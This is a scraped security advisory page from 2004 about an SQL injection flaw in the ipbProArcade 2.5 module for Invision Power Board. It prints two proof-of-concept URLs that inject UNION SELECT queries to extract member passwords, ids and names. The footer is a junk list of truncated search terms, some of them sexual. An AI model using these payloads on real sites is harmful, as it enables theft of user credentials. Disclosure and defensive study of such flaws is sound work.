about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , IPBProArcade Remote SQL Injection Vulnerability


Title IPBProArcade Remote SQL Injection Vulnerability
Published 2004-11-20-12:00AM
Updated 2004-11-20-10:14PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Disclosure of this issue is credited to axl daivy <axlownz@gmail.com>.
Vulnerable  ipbProArcade ipbProArcade 2.5
Not Vulnerable  
Code   No exploit is required to leverage this issue. The following proof of concept exploits have been provided:

For modules installed on Invision Power Board versions 1.X:
http://site.com/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

For modules installed on Invision Power Board versions 2.X:
index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 01:12:43 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
ria sen nu Sexs video zope www.mumait sekar n...enable news for c wwwdudu.co maxcpm.inf dmoz.im urdusexsto Prestige 6 adodb wu-ftpd wu 200 /compo dust Worldsex.c FOTO SARAH gypsypics maxcpm.inf 2195 lo19l freebluefl news for C Sex video www.tkc2c. PHP+Input% s;s 200 /compo 17692 www.jijing www.com89s www.japani zend2 Crack Data port www.52cyyz mallika se carro www.aishwa acropdf mouse imeaj sex xxxlivesex Szxy babypasspo news for c www.shangh mambo Remo 200 /compo